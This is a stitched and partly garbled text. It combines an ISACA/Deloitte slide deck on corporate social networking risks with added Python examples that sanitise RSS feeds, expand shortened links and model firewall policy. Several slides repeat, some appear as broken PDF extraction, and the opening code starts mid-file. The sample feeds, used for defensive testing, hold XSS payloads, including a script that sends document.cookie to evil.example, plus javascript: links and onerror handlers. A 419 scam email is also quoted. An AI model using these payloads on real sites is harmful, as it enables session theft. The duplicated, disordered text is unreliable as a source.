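# script payload in its title, a javascript: URL in its link and an
# event-handler payload in its description.
SAMPLE_RSS = b"""<?xml version="1.0"?>
<rss version="2.0"><channel>
  <title>Example feed</title>
  <item>
    <title>Quarterly results posted</title>
    <link>https://example.com/results</link>
    <description>Results are up.</description>
  </item>
  <item>
    <title><![CDATA[Breaking <script>document.location='https://evil.example/?c='+document.cookie</script>]]></title>
    <link>javascript:alert(document.cookie)</link>
    <description><![CDATA[<img src=x onerror="alert(1)">]]></description>
  </item>
</channel></rss>"""

ALLOWED_SCHEMES = {"http", "https"}


def parse_feed(xml_bytes):
    """Return a list of {'title', 'link', 'description'} dicts.

    The XML parser resolves CDATA sections to plain text, so the script
    payload arrives here as an ordinary string, exactly as it would in any
    aggregator. Nothing returned here is trusted yet.
    """
    root = ET.fromstring(xml_bytes)
    items = []
    for item in root.iter("item"):
        items.append({
            "title": (item.findtext("title") or "").strip(),
            "link": (item.findtext("link") or "").strip(),
            "description": (item.findtext("description") or "").strip(),
        })
    return items


def safe_link(url):
    """Allow only absolute http(s) URLs; anything else (javascript:, data:,
    scheme-relative //host, empty) is neutralised to '#'."""
    parts = urlsplit(url)
    if parts.scheme.lower() in ALLOWED_SCHEMES and parts.netloc:
        return url
    return "#"


def render_item_unsafe(item):
    """The vulnerable pattern: feed fields concatenated into HTML as-is."""
    return '<li><a href="%s">%s</a> %s</li>' % (
        item["link"], item["title"], item["description"])


def render_item_safe(item):
    """The hardened pattern: every field escaped, link scheme checked."""
    return '<li><a href="%s">%s</a> %s</li>' % (
        html.escape(safe_link(item["link"]), quote=True),
        html.escape(item["title"], quote=True),
        html.escape(item["description"], quote=True))


def render_feed(xml_bytes, safe=True):
    """Render the whole feed as an HTML list, safely unless told otherwise."""
    render = render_item_safe if safe else render_item_unsafe
    body = "\n".join(render(item) for item in parse_feed(xml_bytes))
    return "<ul>\n" + body + "\n</ul>"


if __name__ == "__main__":
    print("--- vulnerable rendering ---")
    print(render_feed(SAMPLE_RSS, safe=False))
    print("--- hardened rendering ---")
    print(render_feed(SAMPLE_RSS, safe=True))
```

Escaping at render time is the right layer: the feed text is kept intact for search and storage, and the browser receives the payload as visible text rather than markup. The link check is a scheme allow-list rather than a javascript: deny-list, so data: and vbscript: URLs and scheme-relative links are refused as well.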
www.isaca.org 37
Risks and challenges (cont.)
• Example worms and phishing attacks affecting social networking sites
  – Koobface: targets Facebook, MySpace, hi5, Bebo, Twitter and other sites. Users are prompted to click on a URL purporting to be an update from Adobe, and a worm is downloaded to the PC which looks for personal data.
  – Fbaction: Facebook phishing attack that encourages users to sign up for fbaction.net using their Facebook credentials. Those credentials are then used to hijack the Facebook account.
www.isaca.org 38
Risks and challenges (cont.)
  – Boface: convinces users to click on a link pointing to a video, resulting in a download. Shortly after the download is complete, the user's Facebook account is hijacked and used as a means of spamming (and propagating the worm to) all their friends.
• Common element: they all take advantage of the implied trust that social networking users have in each other.
www.isaca.org 39
Risks and challenges (cont.)
"Has what we've learned about writing software the last 20 years been expressed in the design of Web 2.0? Of course not. It can't even be said to have a design. If showing people what vulnerabilities can do were going to somehow encourage software developers to be more careful about programming, Web 2.0 would not be happening." - Marcus Ranum, Information Security magazine, May 2008
• Trust: data reliability commonly causes issues for social media in the workplace. The Web has partially solved this with techniques such as inbound link counting, and reputation and voting systems are starting to appear, often as plug-ins for social media tools.
• These attacks may also take advantage of URL shortening (bit.ly, tr.im, tinyurl.com, etc.), which hides the real destination of a link until it is clicked.
www.isaca.org 40
Risks and challenges (cont.)
• More on phishing: social networks are a target-rich environment
www.isaca.org 41
Risks and challenges (cont.)
• More on phishing: social networks are a target-rich environment (cont.)
"Dearest One…
Sorry for the nature of this email, please bear with me.
I am Natasha Kone, a 22 year old lady now; I was born on the 1st of January 1986 to the family of Kone. My father's name is Kamara Cone. He was a very wealthy Gold and Cocoa Merchant based in ACCRA and ABIDJAN respectively. I am their only child. When I was a kid I attended a private school and things were well for me and my parents. Things changed when I was in High School; my mother died on the 21st October 1994. My father then took me very special and gave me motherly care. As fate had it, my father died last year…" See http://www.419legal.org for more details.
• The 419 scams have evolved with the technology; they now use LinkedIn to target specific individuals.
wwwisacaorg15
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Using feeds available from a Web site to provide an updated list of its content in the form of a subscription an embedded portion of a Web site or a collection of disparate content on a particular topic
bull RSS (Really Simple Syndication) or Atom syndication and rss xml or rdf files used for the feeds
bull Mashups combine data and feeds from multiple sources to provide a single integrated set of information ldquoeg data plotted on a maprdquo
Syndication and mashups
www.isaca.org 16
Social network – More terminology (cont.)
Videos and photos
• Online collections of videos and photos from users
• Users can upload, tag and rate content
www.isaca.org 17
Social Networking Companies
Social Media: Popular Examples
Wikis: Wikitravel, Wikipedia, wikiHow, WikiBooks, the TV IV
Blogs: livejournal, WordPress, Blogger, Technorati, xanga
Social Networking: myspace.com, LinkedIn, facebook, friendster, plaxo
RSS (Really Simple Syndication): newsgator, Bloglines, iGoogle, FeedBurner
Presence and Microblogging: twitter, Pownce, jaiku, Hictu, tumblr
Social Bookmarking and Tagging: delicious, digg, reddit, newsvine, StumbleUpon
Online Photo and Video Sharing: YouTube, flickr, shutterfly, last-fm, slideshare
www.isaca.org 18
Why and how companies are using social networking
www.isaca.org 19
Statistics on companies using Social Networking
Data was collected between November 2009 and January 2010 among the Fortune Global 100 companies: US = 29 companies, Europe = 48 companies, Asia-Pacific = 20 companies, Latin America = 3 companies
Source: http://www.burson-marsteller.com/Innovation_and_insights/blogs_and_podcasts/BM_Blog/Documents/Burson-Marsteller%202010%20Global%20Social%20Media%20Check-up%20white%20paper.pdf
www.isaca.org 20
Statistics on companies using Social Networking (cont.)
Data was collected between November 2009 and January 2010 among the Fortune Global 100 companies: US = 29 companies, Europe = 48 companies, Asia-Pacific = 20 companies, Latin America = 3 companies
Source: http://www.burson-marsteller.com/Innovation_and_insights/blogs_and_podcasts/BM_Blog/Documents/Burson-Marsteller%202010%20Global%20Social%20Media%20Check-up%20white%20paper.pdf
www.isaca.org 21
Companies typically adopt Social Media for three major benefits
1. Increase employee productivity and operational efficiencies
2. Foster creativity, innovation and collaboration
3. Enhance customer and partner relationships
www.isaca.org 22
Increase employee productivity and operational efficiencies
• Creates a lightweight institutional memory system, letting a company's intellectual assets be easily captured, stored and accessed
• Reduces the net volume of e-mail and allows users to "pull" information at their convenience, as opposed to spending time reading through mass e-mail chains
• Creates better-quality deliverables faster by drawing on the collective talents, knowledge and experiences of other employees around the world
Operational efficiencies
• A leading energy company realized approximately $250K in annual cost savings by conducting its employee conference virtually using Social Media
Improved reporting
• A global investment bank tightened reporting cycle times from several weeks to "about 30 seconds" per stakeholder by enabling them to submit their information directly into a team wiki and making that information instantly available to others in a rich dashboard mashup
www.isaca.org 23
Increase employee productivity and operational efficiencies (cont.)
• American Red Cross
  – Designed to incite discussions around issues the American Red Cross cares about and to describe actions individuals can take (online or offline) to help people prevent, prepare for and respond to emergencies, and to give valuable information about preventing, preparing for and responding to emergencies
  http://redcrosschat.org
www.isaca.org 24
Increase employee productivity and operational efficiencies (cont.)
• Deloitte's DWiki
  – Provides a safe, flexible knowledge creation and information sharing environment for all Deloitte practitioners, across country, practice and Deloitte organizational borders
  – Enhances the client service delivery capabilities of our Deloitte practitioners
  – Serves as a test environment for innovative concepts and solutions which expand the business interests of Deloitte
As used in this document, "Deloitte" means Deloitte LLP. Please see www.deloitte.com/us/about for a detailed description of the legal structure of Deloitte LLP and its subsidiaries.
www.isaca.org 25
Foster creativity, innovation and collaboration
• Harness product, process and service innovations by unlocking creativity and ideas from any area of the company
• The diverse group feedback inherent in social computing accelerates the problem-solving process and produces better solutions
• Employees create unexpected connections with one another and expand their base of knowledge, experience and circle of trusted colleagues
Product innovation
• A leading high-tech manufacturer instituted a "submit-and-vote-for-your-favorite-idea" social community with its consumers, generating over 5,000 ideas and over 300,000 votes in its first three months and subsequently identifying new product offerings
Information capture
• A federal agency created an internal wiki to bolster the capture and dissemination of mission-critical information between field agents
www.isaca.org 26
Foster creativity, innovation and collaboration (cont.)
• Best Buy
  – A community of Best Buy employees who convene regularly to share knowledge, best practices, frustrations, aspirations and a few jokes. Community members include everyone from recent high school graduates to semi-retirees
  https://mix.blueshirtnation.com
www.isaca.org 27
Foster creativity, innovation and collaboration (cont.)
• Deloitte's DStreet
  – Enterprise talent networking site, changing the way we connect with each other
  – Enables another way of collaboration and community building
  – Network, build new relationships and forge successful careers
  – Learn about colleagues and interesting ways to introduce yourself
  – Identify new connection points to create a basis for meaningful conversation
  – A new way of assembling the right team
As used in this document, "Deloitte" means Deloitte LLP. Please see www.deloitte.com/us/about for a detailed description of the legal structure of Deloitte LLP and its subsidiaries.
www.isaca.org 28
Enhance customer and partner relationships
• Opens the lines of communication beyond typical spokespeople such as marketing, sales and PR, and provides an avenue for other important stakeholders (e.g. engineers, scientists, product managers) to gather firsthand feedback from customers
• Allows customers to access help beyond traditional means, with networks that provide peer support and a user-generated knowledgebase, while monitoring customer perception
• Provides a forum for collaborative business development, education and communications with vendors, OEMs and other partners
• Allows consumers who know your products and services best to become a part of the new offering development process
Revenue growth
• A major consumer goods company improved sales by 31.5% by including customer ratings, user-generated product reviews and other social features on its online storefront, also resulting in a 40% uptick in average order value
www.isaca.org 29
Enhance customer and partner relationships (cont.)
• Procter & Gamble
  – Capessa, launched in the "Yahoo! Health" section of Yahoo.com, one of the world's leading internet destinations. Women who register with Capessa.yahoo.com have access to several topic areas, including parenting, pregnancy, weight loss, relationships, career, healthy living and care giving
  http://realwomenrealadvice.com
www.isaca.org 30
Enhance customer and partner relationships (cont.)
• American Express
  – OPEN Forum, an online resource and networking site for business owners. The site is designed to forge meaningful business connections and provide practical, actionable information and insights from influential bloggers, industry leaders and savvy entrepreneurs
  http://www.openforum.com
www.isaca.org 31
Enhance customer and partner relationships (cont.)
• State of Louisville, Kentucky
  – Interactive audit findings on the Web site. Allows the users to discuss previous audit findings
  http://www.louisvilleky.gov/InternalAudit
www.isaca.org 32
Enhance customer and partner relationships (cont.)
• Amazon
  – A social network for people who love books. Users are able to create a virtual shelf to show off their books, see what their friends are reading and discover new books
  http://www.shelfari.com
www.isaca.org 33
Enhance customer and partner relationships (cont.)
• Bank of America (BofA)
  – On January 29, 2010, the Bank of America Web site was down. BofA used twitter to keep in touch with its customers and let them know the latest update
www.isaca.org 34
Risks and challenges
www.isaca.org 35
Risks and challenges
• Farmers and Mobsters
  – Top Facebook Applications
    • Source: http://statistics.allfacebook.com/applications/leaderboard (March 2010)
    • There are now more than 500,000 active applications on the Facebook Platform
Rank  Name  Monthly Active Users
1  FarmVille  82,580,911
2  Static FBML  46,827,021
3  Birthday Cards  41,904,049
4  Café World  30,032,716
5  Facebook for iPhone  29,438,848
6  Texas HoldEm Poker  28,332,917
7  Slide FunSpace  25,630,033
8  Happy Aquarium (BETA)  24,915,971
9  Mafia Wars  24,704,179
10  Causes  24,317,292
www.isaca.org 36
Risks and challenges (cont.)
• New security concerns and attack vectors – a result of the shift in technology toward Web services that empower server-side core technology components, as well as Asynchronous JavaScript and XML ("AJAX") and Rich Internet Application ("RIA") clients that enhance client-end interfaces in the browser itself
• Top 10 Web 2.0 Attack Vectors – http://net-square.com/whitepapers/Top10_Web20_AV.pdf
  – Cross-site scripting ("CSS") in AJAX, e.g. "Samy worm that exploited MySpace.com's CSS flaw"
  – XML poisoning – poisoned XML blocks coming from the AJAX client
  – Malicious AJAX code execution – replay of cookies for each request
  – RSS/Atom injection – JavaScript injected into RSS feeds to attack the client browser
  – Web Services Definition Language ("WSDL") scanning and enumeration
  – Client-side validation in AJAX routines – failing to perform server-side checks
  – Web services routing issues – compromise of intermediate nodes
  – Parameter manipulation with SOAP – web services consume information and variables from SOAP
  – XPATH injection in SOAP message – bypass of authentication mechanisms
  – RIA thick client binary manipulation – issues with session management
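Of the vectors listed above, RSS/Atom injection is the one a feed consumer or mashup author (slide 15) can address directly: feed content is untrusted input, and a mashup that drops a feed item's HTML straight into its own page hands the feed publisher script execution in every reader's browser. The block below is an added example written for this page, not code from the presentation or from the net-square paper; it parses a feed constructed inline for the example and rebuilds each item's HTML through an allow-list so that only harmless markup survives. The tag and attribute allow-list is an assumption chosen for illustration.

```python
import html
import xml.etree.ElementTree as ET
from html.parser import HTMLParser

# Constructed sample RSS document (not taken from the page). The second item's
# description carries the kind of markup an RSS/Atom injection relies on: an
# inline event handler, a <script> element and a javascript: link.
SAMPLE_RSS = """<?xml version="1.0"?>
<rss version="2.0"><channel><title>Example feed</title>
<item><title>Benign</title>
<description>&lt;p&gt;Release notes &lt;a href="https://example.org/notes"&gt;here&lt;/a&gt;&lt;/p&gt;</description></item>
<item><title>Injected &lt;b&gt;title&lt;/b&gt;</title>
<description>&lt;p onmouseover="alert(1)"&gt;Hi&lt;/p&gt;&lt;script&gt;alert(1)&lt;/script&gt;&lt;a href="javascript:alert(1)"&gt;x&lt;/a&gt;</description></item>
</channel></rss>"""

# Allow-list (an assumption for this example): anything not listed is dropped.
ALLOWED_TAGS = {"p", "a", "b", "i", "em", "strong", "ul", "ol", "li", "br"}
ALLOWED_ATTRS = {"a": {"href"}}
SAFE_SCHEMES = ("http://", "https://")
DROP_WITH_BODY = {"script", "style"}  # discard these elements together with their text


class FeedHtmlSanitizer(HTMLParser):
    """Rebuild an HTML fragment keeping only allow-listed tags and attributes."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self._dropping = 0  # nesting depth inside a DROP_WITH_BODY element

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_BODY:
            self._dropping += 1
            return
        if self._dropping or tag not in ALLOWED_TAGS:
            return
        kept = []
        for name, value in attrs:
            value = value or ""
            if name.startswith("on"):  # inline event handlers never pass
                continue
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue
            if name == "href" and not value.lstrip().lower().startswith(SAFE_SCHEMES):
                continue  # rejects javascript:, data: and similar link schemes
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in DROP_WITH_BODY:
            self._dropping = max(0, self._dropping - 1)
            return
        if not self._dropping and tag in ALLOWED_TAGS and tag != "br":
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._dropping:
            self.out.append(html.escape(data, quote=False))  # re-escape text nodes


def sanitize_html(fragment):
    parser = FeedHtmlSanitizer()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out)


def sanitized_items(rss_xml):
    """Parse a feed and return items that are safe to render into the consuming page.
    ElementTree is used for brevity; for feeds from arbitrary publishers use
    defusedxml in production, which also guards against entity-expansion attacks."""
    root = ET.fromstring(rss_xml)
    items = []
    for item in root.iter("item"):
        title = item.findtext("title", default="")
        description = item.findtext("description", default="")
        items.append({
            "title": html.escape(title, quote=False),   # titles are plain text: escape fully
            "description": sanitize_html(description),  # descriptions are HTML: allow-list
        })
    return items


if __name__ == "__main__":
    for entry in sanitized_items(SAMPLE_RSS):
        print(entry["title"], "->", entry["description"])
```

The same allow-list approach applies to Atom `<content>` elements; the point is that a mashup treats every field of a feed as attacker-controlled text, and re-serialises only the markup it has decided to permit, rather than trying to recognise and strip known-bad patterns.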
www.isaca.org 37
Risks and challenges (cont.)
• Example worms and phishing attacks affecting social networking sites
  – Koobface – targets Facebook, MySpace, hi5, Bebo, Twitter and other sites. Users are prompted to click on a URL purporting to be an update from Adobe, and a worm is downloaded to the PC which looks for personal data
  – Fbaction – Facebook phishing attack that encourages users to sign up for fbaction.net using their Facebook credentials. Those credentials are then used to hijack the Facebook account
www.isaca.org 38
Risks and challenges (cont.)
  – Boface – convinces users to click on a link pointing to a video, resulting in a download. Shortly after the download is complete, the user's Facebook account will be hijacked and used as a means of spamming (and propagating a worm to) all their friends
• Common element – they all take advantage of the implied trust that social networking users have with each other
www.isaca.org 39
Risks and challenges (cont.)
"Has what we've learned about writing software the last 20 years been expressed in the design of Web 2.0? Of course not. It can't even be said to have a design. If showing people what vulnerabilities can do were going to somehow encourage software developers to be more careful about programming, Web 2.0 would not be happening." – Marcus Ranum in InfoSec Magazine, May 2008
• Trust – Data reliability commonly causes issues for social media in the workplace. The Web has partially solved this with techniques such as inbound link counting, but reputation and voting systems are starting to appear, often as plug-ins for social media tools
• These attacks may also take advantage of URL shortening services – bit.ly, tr.im, tinyurl.com, etc.
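A shortened link gives the reader no way to judge the destination before clicking, which is why the worms above pair well with it. The check a mail gateway, link scanner or security team can run is to expand the link one redirect at a time, with a hop limit, and only then look at the final host. The following Python block is an added example for this page, not code from the presentation; the live resolver uses only the standard library, and the redirect table used in the test is constructed sample data standing in for real HTTP responses.

```python
import urllib.error
import urllib.request
from urllib.parse import urljoin, urlparse

# Shortener hosts named on the slide; a real deployment keeps a longer list.
SHORTENER_HOSTS = {"bit.ly", "tr.im", "tinyurl.com"}
REDIRECT_CODES = {301, 302, 303, 307, 308}


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Make urllib surface each 3xx instead of silently following it."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def live_fetch_location(url, timeout=5.0):
    """One HEAD request; returns (status, Location header or None)."""
    opener = urllib.request.build_opener(_NoRedirect)
    req = urllib.request.Request(url, method="HEAD")
    try:
        with opener.open(req, timeout=timeout) as resp:
            return resp.status, resp.headers.get("Location")
    except urllib.error.HTTPError as err:
        # With redirects disabled, 3xx responses are raised here.
        return err.code, err.headers.get("Location")


def is_shortened(url):
    host = (urlparse(url).hostname or "").lower()
    return host in SHORTENER_HOSTS


def expand_url(url, fetch_location=live_fetch_location, max_hops=5):
    """Follow redirects one hop at a time, recording the whole chain and
    stopping at max_hops so a redirect loop cannot stall the check."""
    chain = [url]
    for _ in range(max_hops):
        status, location = fetch_location(chain[-1])
        if status not in REDIRECT_CODES or not location:
            return {"final": chain[-1], "chain": chain, "truncated": False}
        chain.append(urljoin(chain[-1], location))  # Location may be relative
    return {"final": chain[-1], "chain": chain, "truncated": True}


# Constructed redirect table (not real links) so the example runs offline.
FAKE_RESPONSES = {
    "http://bit.ly/abc": (301, "http://tinyurl.com/xyz"),
    "http://tinyurl.com/xyz": (302, "/login"),
    "http://tinyurl.com/login": (302, "https://example.org/login"),
    "https://example.org/login": (200, None),
    "http://bit.ly/loop": (302, "http://bit.ly/loop"),
}


def fake_fetch_location(url):
    return FAKE_RESPONSES.get(url, (404, None))


if __name__ == "__main__":
    for link in ("http://bit.ly/abc", "http://bit.ly/loop"):
        result = expand_url(link, fetch_location=fake_fetch_location)
        print(link, "shortened" if is_shortened(link) else "plain",
              "->", result["final"], "(loop)" if result["truncated"] else "")
```

Two design points matter here: the resolver never follows redirects automatically, so every intermediate host is visible and can be matched against block lists, and the hop cap turns a redirect loop into a reportable result rather than a hung worker. Run the check from a sandboxed egress point, since the HEAD request itself tells the shortener that the link was opened.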
www.isaca.org 40
Risks and challenges (cont.)
• More on phishing – social networks are a target-rich environment
www.isaca.org 41
Risks and challenges (cont.)
• More on phishing – social networks are a target-rich environment (cont.)
"Dearest One…
Sorry for the nature of this email, please bear with me.
I am Natasha Kone, a 22 year old lady now. I was born on the 1st of January 1986 to the family of Kone. My father's name is Kamara Cone. He was a very wealthy Gold and Cocoa Merchant based in ACCRA and ABIDJAN respectively. I am their only child. When I was a kid I attended a private school and things were well for me and my parents. Things changed when I was in High School; my mother died on the 21st October 1994. My father then took me very special and gave me motherly care. As fate had it my father died last year……" – See http://www.419legal.org for more details
• The 419 scams have evolved with the technology – now using LinkedIn to target specific individuals
www.isaca.org 42
Risks and challenges (cont.)
• Reputation – Damage to company brand/reputation through inappropriate comments or remarks from employees
  – Even a lack of a response may damage the brand. For example, XYZ Company Inc. creates a Twitter account called XYZ_Cares and then fails to use the account
  – Other examples include creating a social media program but not telling the rest of the company about it, so they may be unaware of any promotions or offers being publicized
• Copyright violation – Third-party material such as essays, articles and photographs is used without written consent from the proprietor
• Intellectual Property theft – Harder to prevent inadvertent data leakage through the one-to-many nature of Web 2.0 as a medium
www.isaca.org 43
Risks and challenges (cont.)
• Failures in the use of Social Media – most companies that use Social Media don't approach it the way they would other mission-critical technology
  – At best, it can be said that most companies today are merely dabbling with Social Media…
  – Few have approached the solution with an integrated strategy or a concrete business case, usually because they either aren't fully convinced of its value or have been slowed by the security and legal issues
  – Without a strategy and proper metrics based on a business case, their projects will remain small, mismanaged and likely to fail
"Fully half of all Social Media investments will fail" – Gartner
www.isaca.org 44
Risks and challenges (cont.)
"When I discovered YouTube, I didn't work for five days. I did nothing. I viewed 'cookie monster sings chocolate rain' about 1,000 times." – Michael Scott from The Office
• Productivity – Users employ social media tools for nonproductive purposes such as socializing ("Social Notworking")
http://news.bbc.co.uk/2/hi/business/8325865.stm
www.isaca.org 45
Risks and challenges (cont.)
• Technical Integration – Most organizations note that integration between individual Web 2.0 applications and their overall infrastructure is a major concern
  – "Sign in using your account with": Facebook, Twitter, Myspace, Yahoo, Google, Windows Live ID, AOL, Blogger, WordPress, Netlog, OpenID, flickr
www.isaca.org 46
Risks and challenges (cont.)
• Information hoarding – In many industries, value is placed on what an employee knows that others do not know. This belief prevents data sharing
• Quantification – Researchers currently face challenges quantifying social networking benefits
  – Valuation techniques include, among others, Beckstrom's law, which states that "The value of a network equals the net value of each user's transactions conducted through that network, valued from the perspective of each user and summed for all"
  Or alternatively:
  – http://en.wikipedia.org/wiki/Beckstrom's_law
www.isaca.org 47
Risks and challenges (cont.)
• Litigation issues – Discrimination, defamation, violation of privacy and harassment are some of the potential concerns that might result in litigation
www.isaca.org 48
A quick word on privacy
"People have really gotten comfortable not only sharing more information and different kinds, but more openly and with more people. That social norm is just something that has evolved over time."
– Mark Zuckerberg, Facebook founder
"If you have something that you don't want anyone to know, maybe you shouldn't be doing it in the first place."
– Eric Schmidt, CEO, Google Inc.
www.isaca.org 49
A quick word on privacy (cont.)
• Loss of Fourth Amendment protection
• Encryption of data storage unlikely
• Lack of encryption while data is in use
• Data remanence – limited attempt to address
www.isaca.org 50
Responding to the risks and challenges
• Policies and procedures
  – Acceptable use policy
    • Details how social networking sites and applications can be used
    • Defines consequences for failure to comply, e.g. "termination of employment and legal action"
• Risk assessment
  – Establish what information is most critical to the business
  – Understand how information might become vulnerable and how to protect it (data mapping)
www.isaca.org 51
Responding to the risks and challenges
• Education and awareness
  – Inform users of the information security risks involved and how to guard against them
    • For example, only install or run applications from trusted sources approved by the corporate IT department
www.isaca.org 52
Responding to the risks and challenges (cont.)
• Vulnerability Assessments
  – Identifying, quantifying and prioritizing the potential vulnerabilities that Social Networking may present to the organization
• Firewalls
  – Historically, firewalls focused on ports, IP addresses and packets
  – But social networking applications operate on ports 80 & 443
  – Next-generation firewall technology offers granular control of social networking functionality:
    • Identify applications regardless of port, protocol, evasive tactic or SSL
    • Identify users regardless of IP address
    • Scan application content in real time
    • Visibility and policy control over application access
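The last four bullets describe what an application-aware policy has to do, and why a port-based rule cannot do it: social networking traffic shares ports 80 and 443 with everything else, so the application has to be recognised from something else in the flow and the user from something other than the source address. The Python block below is an added illustration written for this page (not the presentation's content and not any vendor's product) of that decision logic: the application is matched on the server name the client asked for (TLS SNI or HTTP Host), the user on an IP-to-identity mapping, and the policy on the user's group, so the destination port plays no part. All tables and flows are constructed sample data.

```python
from dataclasses import dataclass
from typing import Optional

# Constructed sample data for this example (not the page's or any vendor's config).
USER_BY_IP = {"10.0.1.15": "alice", "10.0.1.16": "bob"}       # e.g. from directory/DHCP logs
GROUP_BY_USER = {"alice": "marketing", "bob": "engineering"}

# Application signatures keyed on the server name the client requested
# (TLS SNI or HTTP Host), which is why the port of the flow is irrelevant.
APP_BY_HOST_SUFFIX = {
    "facebook.com": "facebook", "fbcdn.net": "facebook",
    "twitter.com": "twitter", "linkedin.com": "linkedin",
}

# Which groups may use which social application; "*" means everyone.
POLICY = {"linkedin": {"*"}, "twitter": {"marketing"}, "facebook": {"marketing"}}


@dataclass
class Flow:
    src_ip: str
    dst_port: int
    server_name: Optional[str]  # None when neither SNI nor Host is visible


def identify_app(flow):
    """Map a flow to a known application by server-name suffix, or None."""
    if not flow.server_name:
        return None
    host = flow.server_name.lower().rstrip(".")
    for suffix, app in APP_BY_HOST_SUFFIX.items():
        if host == suffix or host.endswith("." + suffix):  # exact or subdomain match only
            return app
    return None


def decide(flow):
    """Return the policy decision for one flow, with the reason for the log."""
    user = USER_BY_IP.get(flow.src_ip, "unknown")
    group = GROUP_BY_USER.get(user)
    app = identify_app(flow)
    if app is None:
        return {"user": user, "app": None, "action": "allow",
                "reason": "no social application matched"}
    allowed = POLICY.get(app, set())
    if "*" in allowed or group in allowed:
        return {"user": user, "app": app, "action": "allow",
                "reason": f"{app} permitted for group {group or 'any'}"}
    return {"user": user, "app": app, "action": "block",
            "reason": f"{app} not permitted for user {user} (group {group})"}


def evaluate(flows):
    return [decide(f) for f in flows]


if __name__ == "__main__":
    SAMPLE_FLOWS = [  # constructed flows; note the non-standard port on the second one
        Flow("10.0.1.15", 443, "www.facebook.com"),
        Flow("10.0.1.16", 8443, "www.facebook.com"),
        Flow("10.0.1.16", 443, "www.linkedin.com"),
        Flow("10.0.1.16", 443, None),
        Flow("10.0.9.9", 443, "api.twitter.com"),
    ]
    for flow, verdict in zip(SAMPLE_FLOWS, evaluate(SAMPLE_FLOWS)):
        print(flow.src_ip, flow.dst_port, flow.server_name, "->", verdict["action"], verdict["reason"])
```

Note the two deliberate limits: a flow with no visible server name is not blocked as social traffic, because it was never identified as such (a product that also inspects content would classify it further), and an unknown source address yields an "unknown" user who receives no group privileges, so the policy fails closed for the social applications it does recognise.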
www.isaca.org 53
What is next in the world of social networking
www.isaca.org 54
Where we are at today
• Enterprise Social Media has crossed the tipping point and is no longer considered an "emerging" technology
"The Hype Cycle" – http://en.wikipedia.org/wiki/Hype_cycle
www.isaca.org 55
What's next in the world of social networking
• Increase in the use of mobile devices to access Social Networks
  – Over 600 million people will use their phone to access Social Networks by 2013, an increase of more than 400% over the 2009 figure of 140 million. Source – eMarketer
• Increase in frequency of access
  – Facebook mobile users are 50% more active than other users of the site
• Take your social profile with you as you travel the Web
  – For example – Facebook Connect
• Social Networks will become more pervasive – broadcasting your location in geo-networking apps
  – Interaction between devices. For example, your car's navigation system will be able to learn your friend's location and provide directions to them
www.isaca.org 56
Some further predictions
• Some quotes on social networks
  – "Probably the greatest transformative force in our generation, absent a major war" – Mark Zuckerberg, Facebook founder
  – "(Twitter is)… Something important that has the potential to change the world, though we have a long way to go" – Biz Stone, Co-founder of Twitter
www.isaca.org 57
Q&A
www.isaca.org 58
Today's Presenters
Nelson Gibbs
Senior Manager
AERS – Audit & Enterprise Risk Services
Deloitte & Touche LLP
ngibbs@deloitte.com
+1 213 593 4241
www.isaca.org 59
Appendix
• Additional resources
  – Gopal, Raj et al. "Web 2.0 reinvents corporate networking", Deloitte Consulting LLP (2008)
  – The Economist – A special report on social networking, January 30, 2010
  – Fraser, Matthew; Dutta, Soumitra (2008). Throwing Sheep in the Boardroom: How Online Social Networking Will Transform Your Life, Work and World
  – "Great Wall of Facebook: The Social Network's Plan to Dominate the Internet – and Keep Google Out" by Fred Vogelstein, Wired Magazine (June 2009) – http://www.wired.com/techbiz/it/magazine/17-07/ff_facebookwall
  – "The Future is Social, Not Search, Facebook COO Says" by Ryan Singel, Wired Magazine (October 2009) – http://www.wired.com/epicenter/2009/10/facebook-social-2
  – British Computer Society Social Media Web site – http://www.bcs.org/socialmedia
www.isaca.org 60
This presentation contains general information only and Deloitte is not, by means of this presentation, rendering accounting, business, financial, investment, legal, tax, or other professional advice or services. This presentation is not a substitute for such professional advice or services, nor should it be used as a basis for any decision or action that may affect your business. Before making any decision or taking any action that may affect your business, you should consult a qualified professional advisor.
Deloitte, its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation.
wwwisacaorg16
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Online collections of videos and photos from usersbull Users can upload tag and rate contentVideos and
photos
wwwisacaorg17
Social Networking CompaniesSocial Networking Companies
Social Media Popular Examples
Wikis Wikitravel Wikipedia wikiHow WikiBooks the TV IV
Blogs livejournal WordPress Blogger Technorati xanga
Social Networking myspacecom LinkedIn facebook friendster plaxo
RSS(Really Simple Syndication)
newsgator Bloglines iGoogle FeedBurner
Presence and Microblogging
twitter Pownce jaiku Hictu tumblr
Social Bookmarkingand Tagging
delicious digg reddit newsvine StumbleUpon
Online Photo andVideo Sharing
YouTube flickr shutterfly last-fm slideshare
wwwisacaorg18
Why and how companies are Why and how companies are using social networkingusing social networking
wwwisacaorg19
Statistics on companies using Social Statistics on companies using Social NetworkingNetworking
Data was collected between November 2009 and January 2010 among the Fortune Global 100 companies US = 29 companies Europe = 48 companies Asia-Pacific = 20 companies Latin America = 3 companies
Source httpwwwburson-marstellercomInnovation_and_insightsblogs_and_podcastsBM_BlogDocumentsBurson-Marsteller20201020Global20Social20Media20Check-up20white20paperpdf
wwwisacaorg20
Statistics on companies using Social Statistics on companies using Social Networking (cont)Networking (cont)
Data was collected between November 2009 and January 2010 among the Fortune Global 100 companies US = 29 companies Europe = 48 companies Asia-Pacific = 20 companies Latin America = 3 companies
Source httpwwwburson-marstellercomInnovation_and_insightsblogs_and_podcastsBM_BlogDocumentsBurson-Marsteller20201020Global20Social20Media20Check-up20white20paperpdf
wwwisacaorg21
Companies typically adopt Social Media for Companies typically adopt Social Media for three major benefitsthree major benefits
Increase employee productivityand operational efficiencies
Foster creativity innovationand collaboration
Enhance customer andpartner relationships
1
2
3
wwwisacaorg22
Increase employee productivity and Increase employee productivity and operational efficienciesoperational efficiencies
bull Creates a lightweight institutional memory system for a companyrsquos intellectual assets to be easily captured stored and accessed
